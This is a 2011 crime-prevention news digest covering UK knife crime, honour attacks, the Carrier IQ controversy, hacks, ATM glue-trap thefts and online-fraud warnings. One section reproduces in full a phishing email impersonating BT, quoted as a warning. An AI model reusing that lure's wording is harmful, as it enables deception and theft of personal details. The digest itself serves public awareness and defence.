www.met.police.uk

Young people at risk of getting caught up in violence are being urged by the Metropolitan Police Service (MPS) to visit YouTube to watch a powerful interactive film that sets out the consequences of carrying weapons.

The film 'Choose a Different Ending' is the centre of our launch for the latest anti-weapons campaign, which also features advertisements on targeted TV channels and radio stations, as well as a range of carefully chosen digital platforms. 

The campaign has been running since Monday 21 November with the film unbranded on YouTube and with search mechanisms on MSN Messenger, Hotmail, Facebook and other channels. Officers on boroughs who work in schools have also been supplied with a range of posters and postcards for distribution to pupils. 

The campaign will run for a total of five weeks, until Saturday 24 December.

The film asks viewers to make decisions in relation to various scenarios relating to knife crime and what outcome their decisions have.

Its aim is to encourage the target audience (13-15-year olds) to learn more about the danger carrying a weapon can put them in and to increase public confidence and understanding of our work in tackling serious youth violence.

Although the vast majority of young people are not involved in criminal activity, we are determined to continue to relentlessly target the small minority who do carry or use weapons.

The MPS Operation Connect Unit is also involved in tackling gang-fuelled violence through enforcement and intervention, working with local statutory and voluntary partners to help those who do want to exit the gang violence. 

Commander Steve Rodhouse, lead for the MPS on serious youth violence, said: "The Met's anti-weapons advertising campaign uses a hard-hitting interactive film to help teenagers realise they can make a positive choice to avoid getting involved in youth violence. 

"Young people who carry weapons often tell us it's for their own protection - but the harsh reality is that picking up a knife or gun puts them more at risk of injury and death. 

"Reducing youth and gang-fuelled violence is one of the Met's top priorities - but others need to play their part in tackling this complex problem. Parents and carers of young people need to be wise to where they are, who they are with and if there are any knives missing from home.

"We want to hear from anyone with information about the carrying and use of weapons on our streets, and I would urge young people to search online for 'Choose a Different Ending' to find out more."

(6th December 2011)




MORE NEWS FROM MY SPAM INBOX ! - NEW SPAM OR PHISHING METHOD
Category : phishing

 

I am taking this opportunity to warn you of this new spam / phishing method using the communications company "BT" as its medium. I personally haven't seen its like before. In the actual e-mail the link appears as a BT website (i.e. www.bt.com/etc) [Note 1], but the address coded behind that link text directs the user to another website.
The following is the complete wording from the e-mail, but the link has been changed. Note that BT logos were also included.

Title : Account Information
From : BT Services <bt@btservices.com>

Dear Customer,

This e-mail has been sent to you by BT to inform you that we were unable to update your account information. This might be due to either of the following reasons:

1. A recent change in your personal details. (eg: Address, phone number)
2. Submitting incorrect information during verification process.

Due to this, to ensure that your service is not interrupted, we request you to confirm and update your personal information today by visiting here: http://www.bogus.bt.con/xxx.xxx.xxx

If you have already confirmed your details then please disregard this message as we are processing the changes you have made.

Regards,

BT
Service Department
Thanks for your co-operation.

This e-mail is bogus and is just phishing for personal information. If you receive something like it, delete it immediately and do not CLICK on any link or open any attachments. If you are suspicious about activity on any account (be it a bank or utility), contact your bank or supplier direct using a known telephone number, DO NOT use contact details within these bogus e-mails.

(5th December 2011)


 

ONLINE SHOPPERS WARNED OF RECORD FRAUD THREATS THIS CHRISTMAS
(London Evening Standard, dated 2nd December 2011 author Mark Prigg)
www.thisislondon.co.uk  [Note 1]

Londoners could be hit by record levels of fraud while shopping online this Christmas.

A survey found those in the capital were most likely to ignore basic safety rules, leaving themselves open to hackers emptying their bank accounts.

Last year it was estimated that £67 million of fraud took place at Christmas, and that figure could be beaten this year. A YouGov poll found that 43 per cent of Londoners never check a website's contact details, putting themselves at risk of fraud.

Owen Roberts of Callcredit, which commissioned the research, said: "Once a thief has your personal information, they can wreak havoc with your finances.

"This could result in your credit cards being maxed out or your bank accounts being drained by fraudsters, making buying Christmas presents almost impossible." It comes as retailers prepare for what could be the biggest day in history for online spending on Monday. IMRG, the UK trade body for online retailers, predicts £3.72 billion will be spent online over the next two weeks. Claudine Beaumont of Google warned shoppers to use common sense. She said: "Try to get a feel for the average cost of that item online, and if you see a merchant selling it for significantly less, proceed with caution.

"If you're shopping with a new or unfamiliar retailer, do some research - see if other customers have left reviews describing their experience with the seller before you spend your money with them."

How to avoid the hackers' web trap

- Don't use the same passwords for online bank accounts and email.

- Keep software on your computer up to date so there are no weaknesses that can be exploited by hackers.

- Use a modern, secure web browser, such as Chrome.

- If an offer looks too good to be true, it probably is, so buy with caution.

(5th December 2011)


 

"HONOUR" ATTACK NUMBERS REVEALED BY UK POLICE FORCES
(BBC News, dated 3rd December 2011)
www.bbc.co.uk

UK police recorded at least 2,823 so-called honour attacks last year, figures from 39 out of 52 forces show.

A freedom of information request by the Iranian and Kurdish Women's Rights Organisation (Ikwro) revealed that nearly 500 of these were in London.

Among the 12 forces also able to provide figures from 2009, there was an overall 47% rise in such incidents.

Honour attacks are punishments on people, usually women, for acts deemed to have brought shame on their family.

'Mutilations'
 
Such attacks can include acid attacks, abduction, mutilations, beatings and in some cases, murder.

Ikwro said its research, carried out between July and November, is the best national estimate so far of the extent of honour violence in Britain, although the charity says the figures do not give the full picture.

They found that eight police forces had recorded more than 100 honour-based attacks each in 2010.

The Metropolitan Police had the most at 495, followed by West Midlands (378), West Yorkshire (350), Lancashire (227), Greater Manchester (189), Cleveland (153), Suffolk (118) and Bedfordshire (117).

Of the 12 police forces able to provide 2009 comparison figures, nine recorded a rise in attacks and three saw totals fall.

The biggest rise was in Northumbria, which saw figures leap by 305% from 17 in 2009 to 69 in 2010, followed by a 154% jump in Cambridgeshire from 11 to 28.

A quarter of police forces in the UK were unable or unwilling to provide data and communities have often been reluctant to talk about the crime, Ikwro said.

Its director Diana Nammi said families often tried to deny the existence of honour attacks and those who carried them out were "very much respected".

She told the BBC: "The perpetrators will be even considered as a hero within the community because he is the one defending the family and community's honour and reputation."

She added that there was not enough support for victims, and many needed continuing help and protection.

"For some cases, police and some organisations just help them up to a length of time, then they will stop," she said. "With honour-based violence, the threat may be a lifetime threat for them."

Significant number

Ikwro's report said : "This is the first time that a national estimate has been provided in relation to reporting of honour-based violence. "The number of incidents is significant particularly when we consider the high levels of abuse that victims suffer before they seek help."
The Association of Chief Police Officers (Acpo) published a strategy in 2008 aimed at gauging the scale of the problem and recommending that all English and Welsh forces start recording the number of honour incidents.

Of the UK's 52 forces, 45 have now done that, although there is no national guidance in Scotland.

The 52 comprise 39 in England, four in Wales, eight in Scotland, and the Police Service of Northern Ireland.

Commander Mak Chishty, the Association of Chief Police Officers lead for honour-based violence, said he was satisfied the 2008 strategy was being implemented.

"We're now in consultation on a new strategy. All front-line staff have received awareness training and every force has a champion on honour-based abuse.

"Acpo is confident that any victim who comes to us will receive the help they need."

A Home Office spokesman said: "We are determined to end honour violence and recognise the need for greater consistency on the ground to stop this indefensible practice.

"Our action plan to end violence against women and girls sets out our approach to raise awareness, enhance training for police and prosecutors and better support victims."

Further information

Iranian and Kurdish Women's Rights Organisation : http://ikwro.org.uk/

Association of Chief Police Officers - Honour Based Violence Strategy (Please note the date of review and the current fact [according to article] that Police Forces are not recording this type of crime) :

http://www.acpo.police.uk/documents/crime/2008/200810CRIHBV01.pdf

(5th December 2011)


 

HAS YOUR PHONE BEEN TAPPED BY HIDDEN SPY APP ?
(Metro, dated 2nd December 2011 author Aidan Radnedge)
www.metro.co.uk [Note 1]

Secret software installed on millions of smartphones may be monitoring every text, email and internet page you see. The Carrier IQ app is installed on at least 140 million Android, Blackberry, Apple and Symbian phones.

In what IT analysts say is an "illegal wire tap", Carrier IQ monitors every "keystroke" that is typed in, as well as locations and other data.

Although its California based creators deny any wrongdoing, anyone with the software on their phone is being urged to consider legal action.

Carrier IQ did not respond to Metro calls but did post a message on the company's website. It said: "While we look at many aspects of a device's performance, we are counting and summarising performance, not recording keystrokes or providing tracking tools".

But Ernest Doku, technology expert at consumer website uSwitch.com, said: "The extent of the data Carrier IQ have access to - passwords, secure browsing information and bank details - is genuinely frightening for businesses and consumers alike.

"There needs to be clarity and transparency on what these stealthy applications can do." The deeply-embedded surveillance app is mainly found in the US. Nokia, O2, Vodafone and Blackberry yesterday insisted it was not installed on their phones in Britain.


 

Further Information

(Extract from an article in Computer World, dated 1st December 2011 author Jaikumar Vijayan)

What does Carrier IQ do?

Mountain View, Calif.-based Carrier IQ sells software designed to help wireless service providers and device makers identify and diagnose service and quality related problems such as dropped calls and battery drain. The software can be used to collect data for analyzing service quality, device quality and what Carrier IQ calls mobile customer experience.

Carrier IQ says its software is installed on over 150 million devices worldwide.

Earlier this month, Trevor Eckhart, a 25-year-old security researcher from Connecticut published details of research he had done showing how Carrier IQ software can be easily tweaked to conduct surreptitious and highly intrusive tracking of Android, BlackBerry and other smartphone users.

Eckhart described the software as a keystroke logging rootkit that is hard-to-detect, hard-to-remove and programmed to run by default on millions of handsets without the users' knowledge.

In addition to collecting device and service related data, Carrier IQ's software can collect data about a user's location, application use, Web browsing habits, videos watched, texts read and even the keys they press, according to Eckhart. The software runs when the phone is switched on and can log all activities till it is switched off. Carriers can set 'triggers' or actions that cause specific data to be logged and sent to them.

Full article [Note 1] : http://cwonline.computerworld.com/t/7733097/930454165/542594/0/

(5th December 2011)


 

PROPORTION OF KNIFE CARRIERS JAILED FALLS
(BBC News, dated 2nd December 2011)
www.bbc.co.uk

The proportion of people jailed for carrying a knife in England and Wales has fallen to its lowest level for more than three years.

The Ministry of Justice says just over a fifth - 21% - of those convicted of possessing a knife or offensive weapon between July and September were jailed.

This is less than the previous three months and the lowest figure since the second quarter of 2008.

But the MoJ says this is a provisional figure and may be revised upwards.

Average sentences for those convicted have risen to almost seven months.

The proportion going to jail is still higher than it was in 2007, when it stood at 16%.

The MoJ said 5,466 people were caught carrying knives between July and September, down from 6,490 in 2009.

It says that although knife crime is falling it wants to send a strong message to those who carry knives by bringing in tougher sentences.

Jail terms
 
Increasing numbers of offenders have been given suspended prison terms and community sentences for carrying knives over the same period of July to September this year.

The total number of knife crimes has been steadily falling in recent years but the government is planning to bring in mandatory minimum sentences for teenagers who threaten people with knives, in response to criticism that people are getting off lightly for knife possession.

The measures will not apply to people under the age of 16 and only apply to England and Wales.

The number of juveniles convicted for knife crimes has fallen massively since 2007 but in the same period the proportion of juveniles going to jail has gone up.

The government is amending the Legal Aid & Sentencing Bill to require a minimum sentence of a four-month Detention and Training Order for 16- and 17-year-olds convicted of threatening people with knives.

According to an impact assessment, this could mean hundreds of extra teenagers will be given custodial sentences every year.

The MoJ assessment says 30 to 60 extra beds would be needed in secure accommodation for young people.

Its report says between 200 to 400 more 16- and 17-year-olds will receive custodial sentences every year at an annual cost of between £2m and £4m a year.

An MoJ spokesman said: "Knife crime is falling but we need to send a strong message to those who carry knives - any adult who commits a crime using a knife can expect to be sent to prison and serious offenders can expect a long sentence.

"Alongside this we are introducing a new offence of aggravated knife possession so anyone aged 16 or over who uses a knife to threaten and endanger others will face a custodial sentence."

Last year the Scottish government said the number of people convicted of carrying knives had fallen to 3,194, the lowest figure for a decade.

But the Scottish government launched a hard-hitting advertising campaign earlier this year, called the No Knives, Better Lives project, which saw a 35% reduction in knife-carrying in Inverclyde and a 29% fall in Renfrewshire.

Further information

Ministry of Justice data :

http://www.justice.gov.uk/publications/statistics-and-data/courts-and-sentencing/knife-possession.htm

(5th December 2011)


 

MORE NEWS FROM MY SPAM INBOX- NOVEMBER
Category : phishing
 
My Internet Service Provider's (ISP) spam filter continues to do a good job. The phishing for Santander customer information that I reported on the 10th November has stopped as far as I am concerned. So apart from them I have only received three other phishing e-mails.

- Halifax Online : Titled : "Important Halifax update regarding your privacy". Content : "Your Halifax Online Password and Memorable Information was restricted due to invalid log on attempts by a suspected third party user". Click on supplied link and provide your personal information.

- Halifax Online Banking : Titled : "Halifax restricted account notice". Content : "Your Halifax Online Password and Memorable Information was restricted due to invalid log on attempts by a suspected third party user". Click on supplied link and provide your personal information.

- Northern Rock : Titled : "Northern Rock Account Alert". Content : "Northern Rock are committed to making our service as safe as possible but you can also play your part to protect yourself. We noticed unauthorized access to your online account". Click on supplied link and provide your personal information.

These e-mails are bogus and are just phishing for personal information. If you receive anything like them, delete it immediately and do not open any attachments. If you are suspicious about activity on your bank account, contact your bank direct using a known telephone number, NOT contact details within the bogus e-mails.

(30th November 2011)


 

UNITED NATIONS AGENCY "HACK ATTACK" INVESTIGATED
(BBC News, dated 29th November 2011)
www.bbc.co.uk

A group of hackers has posted more than 100 email addresses and login details which it claimed to have extracted from the United Nations.

Many of the emails involved appear to belong to members of the United Nations Development Programme (UNDP).

The group, which identified itself as Teampoison, attacked the UN's behaviour and called it a "fraud".

A spokeswoman for the UNDP said the agency believed "an old server which contains old data" had been targeted.

"The UNDP found [the] compromised server and took it offline," said Sausan Ghosheh.

"The server goes back to 2007. There are no active passwords listed for those accounts.

"Please note that UNDP.org was not compromised."

'Leak'
 
The details were posted on the website Pastebin under the Teampoison logo.

The message preceding the login details accused the UN of acting to "facilitate the introduction of a New World Order" and asked "United Nations, why didn't you expect us?"

Many of the email addresses given end in undp.org, but others appear to belong to members of the Organisation for Economic Co-operation and Development (OECD), the World Health Organisation (WHO) and the UK's Office for National Statistics (ONS). The poster noted that several of the accounts had "no passwords".

The message ended with the taunt: "The question now is how? We will let the so called 'security experts' over at the UN figure that out... Have a Nice Day."

Credit card attacks
 
The security company Sophos noted that Teampoison hackers had previously attacked the maker of the Blackberry smartphone's website and had published private information about former UK Prime Minister Tony Blair.

"Teampoison recently announced they were joining forces with Anonymous on a new initiative dubbed 'Operation Robin Hood', targeting banks and financial institutions," the firm's senior technology consultant, Graham Cluley wrote on Sophos's blog.

The groups said at the time that their operation aimed to take money from credit cards and donate it to individuals and charities.

They said people would not be harmed as the banks had to refund fraudulent charges.

Teampoison added a "shoutout" to Anonymous in its UN attack posting, adding a link to a Youtube video with more information about its banking attack plan.

These latest moves serve as a reminder that so-called hacktivists are skilled and willing to collaborate to take down their targets, according to Professor Alan Woodward from the University of Surrey's department of computing.

"One of the big problems is that there is so much data around that people forget about their older systems that still have valuable data on them," he said. "The lesson here is that anything that holds any data of any value must be protected."

(30th November 2011)


 

FIFTEEN MEN ARE SENTENCED TO A TOTAL OF 48 YEARS IN PRISON
(Courtesy of : Metropolitan Police, dated 28th November 2011)
www.met.police.uk

Fifteen men have been sentenced to a total of 48½ years in prison following a complex drugs operation in Hackney. Sentencing took place at Snaresbrook Crown Court on 24 and 25 November, 2011.

The investigation by Hackney Police, in conjunction with Hackney Council and the UK Border Agency, involved a four-month operation in Ridley Road and Dalston Junction, E8, aimed at tackling class A drug dealing in the area.

On Tuesday 19 July 2011, arrests were made as part of Operation Marsican, an initiative to tackle serious and organised crime in Hackney, which was jointly run and funded by the police and Hackney Council.

Since the arrest phase of this operation, overall crime in Dalston has fallen by 34%. Violent crime has fallen by 61% in the area. It is believed that these reductions have been achieved largely due to the reduction of drug availability in the area. The amount of thefts, dips and cycle thefts have also been significantly reduced.

The individuals were sentenced for supplying and having in their possession Class A and Class B drugs. The terms of imprisonment ranged from 2 to 4 years.

DC Anna Saleh, from Hackney Police, said: "Drug dealing and associated crime has long plagued Ridley Road Market and the surrounding area. Operation Marsican was a 6 month joint initiative between Hackney police and Council aimed at targeting this problem. Its success has returned the streets to the local community and sends out a clear message that drug dealing will not be tolerated."

DI Rhys Willis, from Hackney's Op Bantam (Gun Unit) & Drug Squad, said: "The community of Hackney and Hackney Council were extremely concerned about blatant drug dealing in this busy market. This was a painstaking investigation involving Hackney's Safer Neighbourhoods Teams working alongside the Met's Serious Crime Directorate and relying heavily on Hackney Council's CCTV. With the planning and assistance of the Met's 3 area Territorial Support Group (TSG) and other TSG units, we effectively closed the market and swept up all of the dealers. The early inclusion and positive approach of the Crown Prosecution Service secured charges and due to excellent quality of the case file preparation, nearly all the defendants pleaded guilty. Although time consuming and costly, the end results illustrate these operations work. However, without the support of the local authority and their funding, achieving such results would be unattainable."

Mayor of Hackney Jules Pipe said: "These sentences demonstrate that those committing serious crimes in our borough will be brought to justice. Residents told us that these individuals had been causing major issues in Dalston for some time. The strong partnership between the Council and Police enabled us to tackle this entrenched problem and has led to a significant reduction in crime in the area. This should serve as a warning to the minority involved in criminality that their behaviour will not be tolerated in Hackney."

(The four-month investigation was led by Operation Bantam, Hackney Police's proactive drugs and firearms squad. Also supporting the operation were the Council's CCTV unit, the Crown Prosecution Service (CPS), Dalston Safer Neighbourhoods policing team, and the Metropolitan Police's Territorial Support Group, dog unit, and air support team.)

(30th November 2011)


 

WHAT'S NEW IN COMPUTER SECURITY - NOVEMBER

All links under this heading are [Note 1]

The following is a group of article summaries on what is happening around the World when it comes to computer security. One way or another at least one of them will affect you.

HACKERS LAUNCH MILLIONS OF JAVA EXPLOITS
(Computer World, dated 29th November 2011 author Gregg Keizer)

Full Article [Note 1] : http://cwonline.computerworld.com/t/7729199/930454165/541884/0/

Hackers continue to launch attacks exploiting vulnerabilities in Oracle's Java software in record numbers, Microsoft said Monday.

Citing research from a recent report, Tim Rains, a director in the company's Trustworthy Computing group, said that up to half of all attacks detected and blocked by Microsoft's security software over a 12-month period were Java exploits. Altogether, Microsoft stopped more than 27 million Java exploits from mid-2010 through mid-2011.

The most commonly-blocked Java attacks -- to the tune of over 2.5 million of them -- in the first half of 2011 exploited a bug disclosed in March 2010 and patched by Oracle the same month. Second on the popularity chart for the full 12-month stretch was an exploit of a bug patched in early December 2008, nearly three years ago.

Editor's Note : For all you Home computer users. Java is not just used in relation to coffee. It is a software language that allows your computer to provide such things as fancy graphics when surfing the internet. The version that is supplied by Oracle is independent of Microsoft, so will not be included in any updates from them.


 

HP LASERJET PRINTERS VULNERABLE TO ATTACKS
(Computer World, dated 29th November 2011 author Jaikumar Vijayan)

Full Article : http://cwonline.computerworld.com/t/7729199/930454165/541889/0/

Millions of Hewlett Packard Co.'s LaserJet printers contain a security weakness that could allow attackers to take control of the systems, steal data from them and issue commands that could cause the devices to overheat and catch fire, according to two researchers from Columbia University.

Company downplays danger threat, says fix is coming


 

CRIMINALS SABOTAGING CYBER MONDAY
(Computer World, dated 28th November 2011 author Gregg Keizer)

Full Article : http://cwonline.computerworld.com/t/7727305/930454165/541717/0/

Security experts today warned consumers of a rapidly mutating spam campaign using bogus messages from United Parcel Service (UPS) claiming that a package could not be delivered.

The spam run, which actually began earlier this month, is just one way that security researchers believe criminals will exploit the holiday season online buying spree.

According to Cloudmark engineering director Angela Knox, the UPS-based scam uses phony email to dupe recipients into either opening an attachment or clicking on a link to infect machines with malware.


 

LARGEST CYBER ATTACK SO FAR THIS YEAR
(Computer World, dated 24th December 2011 author Lucian Constantin)

Full Article :  http://cwonline.computerworld.com/t/7724338/930454165/541501/0/

A week-long Distributed Denial-of-Service (DDoS) attack that launched a flood of traffic at an Asian e-commerce company in early November was the biggest such incident so far this year, according to Prolexic, a company that defends websites against such attacks.

The DDoS attack consisted of four consecutive waves launched from multiple botnets between Nov. 5 and Nov. 12, 2011, Prolexic said. It estimated that up to 250,000 computers infected with malware participated in the attack, many of them in China.

At the height of the attack, those computers made 15,000 connections per second to the target company's e-commerce platform, swamping it with up to 45Gbps of traffic, Prolexic said. It declined to name the company, one of its clients, citing a confidentiality agreement. The reason for the attack is unknown, but a disgruntled user or a competitor performing industrial sabotage are two of the possibilities.


 

FOUR RISING THREATS FROM CYBERCRIMINALS
(Computer World, dated 21st November 2011 author John Brandon)

Full Article : http://cwonline.computerworld.com/t/7710836/930454165/540816/0/

Criminal hackers never sleep, it seems. Just when you think you've battened down the hatches and fully safeguarded yourself or your business from electronic security risks, along comes a new exploit to keep you up at night. It might be an SMS text message with a malevolent payload or an errant signal designed to jam GPS receivers.

Whether you're protecting corporate data or simply trying to keep your personal files safe, these threats -- some rapidly growing, others still emerging -- put your systems at risk. Fortunately, security procedures and tools are available to help you win the fight.


 

ANDROID MALWARE EXPLODES, JUMPS FIVE-FOLD SINCE JULY
(Computer World, dated 18th November 2011 author Gregg Keizer)

Full Article : http://cwonline.computerworld.com/t/7710836/930454165/540818/0/

Malware targeting Google's Android mobile operating system exploded in the last several months, its volume quintupling since July, Juniper Networks said today.

The rash of infected apps aimed at Android owners shows no sign of abating, said Dan Hoffman, Juniper's chief mobile security analyst and a member of the company's global threat center.

"We're seeing a mix of the traditional hacking community [working] on malware very similar to organized efforts on the PC side, as well as people who are just a little smart, the '15-year-old kid crowd,' who are able to hide some malicious content in an app," said Hoffman in an interview today.


 

FACEBOOK CONFIRMS NASTY PORN STORM
(Computer World, dated 15th November 2011 author Gregg Keizer)

Full Article : http://cwonline.computerworld.com/t/7703643/930454165/540284/0/

Facebook users have been bombarded with explicit and violent images in the latest malware campaign aimed at the giant social networking site, a security researcher said today.

The company confirmed the attack and said it had "dramatically limited the damage" and was on the trail of those responsible.

"For the last 24 hours, many people have reported seeing highly-offensive images on their Facebook news feeds," said Graham Cluley, a senior technology consultant at antivirus vendor Sophos, in an interview early Tuesday.

"But exactly how those images got there and what caused them to appear, is still somewhat of a mystery," Cluley added.

Cluley speculated that the attack may have been based on "clickjacking," which describes a type of attack where hackers plant invisible "buttons" on a website page. When a user clicks on the overlaying page component, they actually execute malicious code or script that can hijack their browser or personal computer.


 

HOW TO LOCK DOWN YOUR WIRELESS NETWORK
(Computer World, dated 11th November 2011 author Alex Wawro)

Full Article :  http://cwonline.computerworld.com/t/7696680/930454165/539862/0/

If you operate a wireless network for your home or business, it's important to ward it against opportunistic hackers seeking to steal your data or hijack your Wi-Fi for their own nefarious purposes. We spoke to Steven Andrs, CTO of security consulting firm Special Ops Security, to learn about the best ways to lock down your Wi-Fi. To get started, you'll need to log in to your router's administrative console by typing the router's IP address into your Web browser's address bar.

This includes changing passwords, and enabling encryption.


 

EU DATA PROTECTION REFORM WOULD PUT PRESSURE ON FOREIGN COMPANIES
(Computer World, dated 10th November 2011 author Lucian Constantin)

Full Article : http://cwonline.computerworld.com/t/7693734/930454165/539714/0/

The European Commission is preparing a major reform of the E.U. Data Protection Directive, which will focus on how foreign companies handle European consumer data.

In a joint statement released on Monday, European Justice Commissioner Viviane Reding and Germany's Federal Minister for Consumer Protection Ilse Aigner said that European consumers should have their data protected regardless of the country where companies processing it are established.




MOBILE THREATS TOP HOLIDAY SCAM LIST
(Computer World, dated 9th November 2011 author Eric Mack)

 

Full Article : http://cwonline.computerworld.com/t/7690293/930454165/539195/0/

Malware targeting Android-powered mobile devices and Apple computers top a list of scams and security threats that shoppers need to guard against this holiday season.

McAfee has released its annual 12 scams of Christmas list, warning of a 76% increase in malware targeting Android devices in the second quarter of 2011 over the first, including those that target QR codes, which many shoppers will be using to purchase or get information about products.


 

FEDS LEAD BIGGEST BOTNET TAKEDOWN EVER AND END MASSIVE FRAUD
(Computer World, dated 10th November 2011 author Gregg Keizer)

Full Article : http://cwonline.computerworld.com/t/7690293/930454165/539198/0/

The botnet takedown announced Wednesday by the U.S. Department of Justice was the biggest in history, according to a security company that worked with authorities to identify the alleged criminals.

Dubbed "DNS Changer," the collection of compromised computers numbered over four million machines, or more than twice the size of the Rustock botnet that Microsoft and U.S. law enforcement officials brought to its knees last March.

About a quarter of the bots were Windows PCs and Macs based in the U.S.

Feike Hacquebord, a senior threat researcher at Trend Micro, called the operation the "biggest cybercriminal takedown in history" in a blog post yesterday.

Trend Micro was one of several companies and organizations credited by the FBI for contributing to the investigation leading to the takedown. Others included Mandiant, Neustar, Spamhaus and the University of Alabama at Birmingham's computer forensics research group.


 

CALLING SERVICE HELPS CYBERCRIMINALS EXTRACT SENSITIVE INFO
(Computer World, dated 9th November 2011 author Lucian Constantin)

Full Article : http://cwonline.computerworld.com/t/7690293/930454165/539203/0/


Researchers from security vendor Trusteer have come across a professional calling service that caters to cybercriminals. The business offers to extract sensitive information needed for bank fraud and identity theft from individuals.

The security company spotted an advertisement for making on-demand calls in English and other European languages to private individuals, banks, shops, post offices and similar organizations. At a cost of $10 per call, cybercriminals were offered the possibility of obtaining the missing pieces of information they needed to pull off attacks.

Fraudsters can either use malware to steal personal and financial information or buy it from the underground market in bulk, said Amit Klein, Trusteer's chief technology officer. However, sometimes this information is insufficient to perform fraud, he added.


 

SOCIALLY ENGINEERED ATTACKS ON BUSINESS BANK ACCOUNTS
(Computer World, dated 8th November 2011 author Richi Jennings)

Full Article : http://cwonline.computerworld.com/t/7688406/930454166/539061/0/

Your business banking account is under threat from scammers posing as your bank. Yes, we've all heard of phishing, but this is different. Modern protections against bogus online bank transactions mean that fraudsters may only have part of the information they need to steal your money.

You've probably heard of the phone-based malware scams that have been doing the rounds for a few years. In a typical scenario, the victim gets a phone call from a call center pretending to be Microsoft. The fraudster goes on to remotely control the victim's PC and install malware; finally demanding payment to remove the malware.




DARPA GETS SERIOUS WITH INTERNET SECURITY
(Computer World, dated 8th November 2011 author Michael Cooney)

 

Full Article : http://cwonline.computerworld.com/t/7688182/930454165/538991/0/

The Defense Advanced Research Projects Agency (DARPA) had a big hand in creating the Internet and now it wants to get serious about protecting it.

At its Colloquium on Future Directions in Cyber Security this week, DARPA Director Regina Dugan said that since 2009, the agency has steadily increased its cyber research efforts. Its budget submission for fiscal year 2012 increased cyber research funding by $88 million, from $120 million to $208 million. In addition, over the next five years, the agency plans to increase its top-line budget investment in cyber research from 8% to 12%.


 

ISRAEL GOVERNMENT WEBSITE DOWN, AFTER HACKER THREAT
(Computer World, dated 6th November author John Ribeiro)

Full Article : http://cwonline.computerworld.com/t/7682949/930454165/538613/0/


Israeli government websites were down on Sunday, two days after the hacker group Anonymous had threatened to attack the government for its maritime blockade of the Gaza Strip.

Israel has however said that the websites were down because of a server malfunction.

The English websites of the Mossad intelligence service, and Israel Defense Forces (IDF) were still down late Sunday. The website of Mossad was under maintenance, while that of IDF was not accessible. The website of the Israel Security Agency, known as Shabak or Shin Bet, was also under maintenance.




LOOSE LIPS STILL SINK CORPORATE SHIPS
(Computer World, dated 3rd November 2011 author "Darlene Storm")

 

Full Article :  http://cwonline.computerworld.com/t/7679225/930454165/538477/0/

Social engineering contestants poured out the schmooze on these five different industries -- retail, airlines, food service, technology, and mobile services. Targeted companies were Apple, AT&T, Conagra Foods, Dell, Delta Airlines, IBM, McDonalds, Oracle, Symantec, Sysco Foods, Target, United Airlines, Verizon, and Walmart. Long before placing the 25-minute social engineering phone call, based on a "pretext" scenario, contestants used online resources to research and gather initial intelligence, develop an attack vector, and compile dossiers on their targets.


 

US REPORT WARNS OF RUSSIA, CHINA CYBER SPYING
(Computer World, dated 3rd November 2011 author Jeremy Kirk)

Full Article :  http://cwonline.computerworld.com/t/7679225/930454165/538480/0/


The U.S. can expect more aggressive efforts from countries such as Russia and China to collect information through cyberespionage in areas such as pharmaceuticals, defense and manufacturing, according to a new government report released Thursday.

The two countries were singled out in the report from the Office of the National Counterintelligence Executive, which also issued recommendations for how organizations can strengthen their defenses.

"Chinese actors are the world's most active and persistent perpetrators of economic espionage," the report said. "Russia's intelligence services are conducting a range of activities to collect economic information and technology from U.S. targets."

(30th November 2011)


THIEVES USING NEW GLUE TRAPS TO SNATCH CASH FROM MACHINES
(Evening News, dated 25th November 2011 author Justin Davenport)
www.thisislondon.co.uk  [Note 1]

Glue traps normally sold to catch rats and mice are being used in a new twist in bank cash machine thefts. The ploy is a variation of the Lebanese loop device which criminals used to trap bank cards in cash machines.

Police say that instead of using a trick to trap people's cards, crime gangs are now using gadgets to trap their cash. Customers who are victims of the con walk away from the cash machine believing it is broken. The fraudsters then move in and remove the device from the machines with the cash still attached.

One detective said there was increasing evidence of gangs using the devices across London.

He said: "They get between £30 to £50 a time or more and do the trick at different machines three to four times a night, so it can be quite lucrative."

The fraudsters use "sticky boards" covered with powerful glue which are sold to trap rats and mice.

They are inserted into the bank machines and trap cash as it is withdrawn. The detective said: "As soon as banks tighten up security in one area criminals come up with a new way of beating the system."

In the past thieves have used sophisticated methods of targeting customers, including using pinhole cameras, radio transmitters and false fronts for cash dispensers.

In one case a gang got away with £200,000 in just over a month using cash machine skimming devices.

A spokesman for cash machine network Link said there was anecdotal evidence that the number of cash machine frauds has risen in recent months and confirmed the trend of criminals using devices to prevent cash being ejected from the machines.

Last year more than £33million was fraudulently withdrawn from machines in Britain, a fall on the year before.

Police warn people to report anything suspicious about cash machines and watch out for people "surfing" their shoulder.

If they experience problems withdrawing cash they are advised to call their bank or credit card company immediately.

(25th November 2011)


 

BLACK FRIDAY ITUNES INFECTED CREDIT MALWARE ALERT
(BBC News, dated 24th November 2011)
www.bbc.co.uk

Criminals are targeting internet users with a new gift certificate scam, according to security experts.

Users receive an email that claims to be from Apple's iTunes store, warns the Eleven security blog (German language). The ZIP file attached contains malware that may allow hackers to gain access to the recipient's computer. The blog says the attack appears to have been timed to coincide with Black Friday, one of the US's busiest shopping days.

Black Friday was the name used by Philadelphia's police department in the 1960s to describe the day after Thanksgiving because of all the traffic jams caused by people visiting the city's stores.

It is now viewed by many retailers as the start of the Christmas shopping season. They mark the day with one-off discounts and other special offers.

Eleven says the period has become one of the most popular times for internet scammers to target users.

Infected offer
 
The security firm says that users are told they have been sent $50 (£32) of iTunes store credit and need to open an attached file to find out their certificate code.

The file contains a program known as Mal/BredoZp-B.

PCthreat.com says the software opens up a backdoor on Windows users' computers and may also capture passwords and other information. It says the code may also slow down the infected computer's performance and make files disappear.

The malware can be removed with the use of anti-spyware tools.

Facebook phishing
 
Security adviser Sophos warns of a separate threat linked to Facebook.

It says users are receiving emails claiming that they have violated the social network's policy regulations by annoying or insulting other members. An attached link takes users to a web page that presents them with a fake "Facebook Account Disabled" form.

The firm says that members are then asked to fill in a series of forms requesting their login details, country of residence and the first six digits of their credit card number. If the users refuse they are told their account will be blocked automatically.

"New day, new attempt," writes Sophos's security writer Lisa Vaas on the company's blog.

"All these phishing scams boil down to a naked grab for your account details. Remember, neither Facebook nor other reputable social media sites would ask for this information."

(25th November 2011)


 

UK CYBER SECURITY STRATEGY DUE TO BE UNVEILED
(BBC News, dated 25th November 2011)
www.bbc.co.uk

The government will reveal its plan to tackle cyber crime later, including using the intelligence agency GCHQ to help the private sector protect itself.

Police forces will be encouraged to train "cyber specials", while specialist Army reservists could also be used to provide particular skills. There will also be a big focus on helping the public protect themselves.

